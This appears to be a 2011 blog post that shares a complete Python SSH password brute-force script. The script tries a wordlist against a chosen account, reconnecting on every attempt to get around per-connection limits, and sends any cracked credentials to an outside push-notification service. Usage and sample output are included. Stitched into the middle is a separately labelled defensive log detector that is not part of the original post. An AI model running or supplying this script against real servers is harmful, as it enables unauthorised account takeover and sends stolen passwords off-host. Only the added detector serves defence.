SSH Bruteforcer with Prowl Push notifications

This is a script I made to test the general password strength for the Administrator/root account on servers at my work. It uses a file as its backend, preferably a wordlist, to try to bruteforce the password on an account of your choice. After succeeding, it prints out the password and sends a push notification using Prowl to your iPhone or other iOS device with the username and password. I made the latter because I like being able to leave things unattended and get notified when they are done, which you might have seen from my other scripts. To avoid the usual socket close which, for example, OpenSSH has after about 3-5 passwords, it creates a new connection for every attempt, so it won't disconnect you after too many attempts (unless iptables/pf is configured to do so).

This script, however, depends on a few libs, so a scriptkiddie can't just wget/fetch it onto a random server and start using it. You need to be root OR be able to install the required libs before running this script. On top of that, it's not fast, and it doesn't support threading! It tries about 1 password/second, making it about 3600 passwords every hour! Therefore, this is NOT an ideal script for scriptkiddies, so move on. This is for testing only. You can download the script here.
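Seen from the server side, the two behaviours described above (a new connection for every attempt, about one password per second) leave a recognisable trace in sshd's auth log: a stream of failures for one account from one address, each on a different source port. The detector below is an added example, not part of the original script or post; the function names, the thresholds (10 connections within 60 seconds), the assumed year and the sample log lines are all constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# OpenSSH password-auth log line (syslog format; the year is not logged).
LINE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ [\d:]{8}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port (?P<port>\d+)")

def detect(lines, window=timedelta(seconds=60), threshold=10, year=2011):
    """Return (kind, ip, user) alerts for sources whose failures arrive on
    many separate connections (distinct source ports) inside the window."""
    recent = defaultdict(list)          # (ip, user) -> [(time, port), ...]
    flagged, alerts = set(), []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        when = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        key = (m["ip"], m["user"])
        if m["result"] == "Failed":
            recent[key].append((when, m["port"]))
            # Drop failures that have aged out of the sliding window.
            recent[key] = [(t, p) for t, p in recent[key] if when - t <= window]
            connections = {p for _, p in recent[key]}
            if len(connections) >= threshold and key not in flagged:
                flagged.add(key)
                alerts.append(("bruteforce",) + key)
        elif key in flagged:
            # A success after a flagged run means the password was guessed.
            alerts.append(("compromised",) + key)
    return alerts

def sample_log():
    """Constructed sample: 12 one-per-connection failures, then a success,
    followed by a user who mistypes three times on a single connection."""
    rows = [f"Jun  7 00:00:{s:02d} srv sshd[{900 + s}]: Failed password for "
            f"root from 203.0.113.5 port {40000 + s} ssh2" for s in range(12)]
    rows.append("Jun  7 00:00:12 srv sshd[912]: Accepted password for root "
                "from 203.0.113.5 port 40012 ssh2")
    rows += [f"Jun  7 00:01:0{s} srv sshd[950]: Failed password for alice "
             f"from 198.51.100.7 port 51000 ssh2" for s in range(3)]
    rows.append("Jun  7 00:01:05 srv sshd[950]: Accepted password for alice "
                "from 198.51.100.7 port 51000 ssh2")
    return rows

if __name__ == "__main__":
    for alert in detect(sample_log()):
        print(alert)
```

Per-source rate limiting of new connections, the iptables/pf configuration mentioned above, is what interrupts this pattern; sshd's own per-connection attempt limit does not, because every guess arrives on a fresh connection.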

Usage

phone:~# ./bruteforce.py
Usage: ./bruteforce.py host port username passwordlist(file) prowl_apikey(optional for push)
phone:~# 

Password list format

The password file is pretty straightforward. Just type each word you want to try on its own line in the file. An example follows.

Password1
Password2
Password3
Password4
etc

These can be words or whatever you want. The file format doesn't really matter, as long as it's plain text. The script does, however, strip whitespace at the beginning and end of each line (password).

Bruteforce.py source

The source follows. If I remember correctly, the only non-standard libs are httplib, urllib and paramiko. I don't remember what httplib and urllib are called in Debian GNU/Linux, but paramiko can be installed with:

$ apt-get install python-paramiko

#!/usr/bin/python

import paramiko
import sys
import socket
from httplib import HTTPSConnection as https
from urllib import urlencode

###############################################
#
# Author: sniker
# Contact: irc.eth0.info
#
# eth0 will prevail. || irc.eth0.info
#
##############################################

API_DOMAIN = 'prowl.weks.net'
__version__ = "0.3"

def post(apikey, application, event, description, priority):

    headers = {'User-Agent': application + "/%s" % str(__version__),
                'Content-type': "application/x-www-form-urlencoded"}

    h = https(API_DOMAIN)

    data = {
            'apikey': apikey,
            'application': application,
            'event': event,
            'description': description,
            'priority': priority
    }

    h.request( "POST", "/publicapi/add", headers = headers, body = urlencode(data))

def check(host, p, user, passw):
    ssh = paramiko.SSHClient()
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())

    try:
        ssh.connect(host, port=p, username=user, password=passw)
        return True
    except paramiko.AuthenticationException:
        return False
    except paramiko.SSHException:
        sys.exit("Random SSH Exception")
    except socket.error:
        sys.exit("socket error(timeout, connection refused etc)")

if len(sys.argv) < 5:
    print "Usage: "+ sys.argv[0] +" host port username passwordlist(file) prowl_apikey(optional for push)"
    sys.exit(1)

print "Trying to hax " + sys.argv[3] + "@"+ sys.argv[1] +":"+ sys.argv[2] +"\n"

f = open(sys.argv[4], "r")

for line in f:
    line = line.strip()
    print "Trying " + line

    if check(sys.argv[1], int(sys.argv[2]), sys.argv[3], line):
        print "Headshot @ "+ sys.argv[3] + ": " + line
        try:
            post(sys.argv[5], "Bruteforce", "HIT!", "Password for "+ sys.argv[3] + "@"+ sys.argv[1] + ":"+ sys.argv[2] +" is: "+ line, 0)
        except IndexError:
            sys.exit(1)
        sys.exit(1)

That should be about it. Works for me, should work for you!

Example output

phone:~# ./bruteforce.py shell.eth0.info 11111 test list.txt [API_key_removed]
Trying to hax test@shell.eth0.info:11111

Trying lol
Trying sdfdsf
Trying tewwer
Trying hdghgfdhdf
Trying lulz
Trying sdf
Trying hghtert2tre
Trying yfhsgs245
Trying god
Trying love
Trying sucks
Trying Poomaif7
Headshot @ test: Poomaif7
phone:~# 

iPhone screenshot!

Bruteforce Prowl Screenshot

Author

sniker[at]codebase[dot]nu

Updated Tue, 07 Jun 2011 00:06:41 +0200
